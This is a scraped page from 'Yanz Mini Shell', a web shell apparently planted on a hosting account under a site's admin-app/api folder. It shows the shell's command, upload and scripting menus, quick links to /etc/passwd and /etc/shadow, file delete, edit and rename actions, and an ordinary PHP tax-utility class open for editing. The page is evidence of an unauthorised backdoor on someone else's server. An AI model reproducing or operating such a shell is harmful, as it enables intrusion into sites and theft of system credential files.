Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
admin-app
api
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App\Utils; use App\TaxRate; class TaxUtil extends Util { /** * Updates tax amount of a tax group * * @param int $group_tax_id * @return void */ public function updateGroupTaxAmount($group_tax_id) { $amount = 0; $tax_rate = TaxRate::where('id', $group_tax_id)->with(['sub_taxes'])->first(); foreach ($tax_rate->sub_taxes as $sub_tax) { $amount += $sub_tax->amount; } $tax_rate->amount = $amount; $tax_rate->save(); } }
Free Space : 11795148800 Byte